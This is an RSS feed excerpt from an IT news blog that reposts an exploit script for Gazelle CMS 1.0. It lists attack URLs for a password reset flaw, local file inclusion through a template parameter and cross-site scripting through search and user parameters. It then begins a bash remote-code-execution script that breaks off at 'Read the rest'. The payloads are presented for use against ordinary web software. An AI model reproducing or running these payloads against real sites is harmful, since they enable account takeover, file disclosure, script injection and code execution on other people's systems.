GO IT WORLD | IT TECH | IT NEWS » gazelle cms http://www.goitworld.com goitworld.com Tue, 10 Jan 2012 10:03:06 +0000 en hourly 1 http://wordpress.org/?v=3.1.2 Gazelle CMS 1.0 Multiple Vulnerabilities RCE Exploit http://www.goitworld.com/gazelle-cms-1-0-multiple-vulnerabilities-rce-exploit/ http://www.goitworld.com/gazelle-cms-1-0-multiple-vulnerabilities-rce-exploit/#comments Thu, 13 Aug 2009 09:08:23 +0000 jason http://www.goitworld.com/gazelle-cms-1-0-multiple-vulnerabilities-rce-exploit/

#!/bin/bash
#       Gazelle CMS 1.0 Multiple Vulnerabilities
#       Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
#       Found by white_sheep on 11/08/2009
#       Contact: sheewhite@googlemail.com – https://www.ihteam.net
#       Need magic_quote_gpc Off for RCE and LFI
#       Thanks to R00T[ATI]
#
#               PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
#               LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
#               XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
#               RCE:
echo
echo "###############################################"
echo "#             GazelleCMS 1.0 RCE              #"… Read the rest

]]> http://www.goitworld.com/gazelle-cms-1-0-multiple-vulnerabilities-rce-exploit/feed/ 2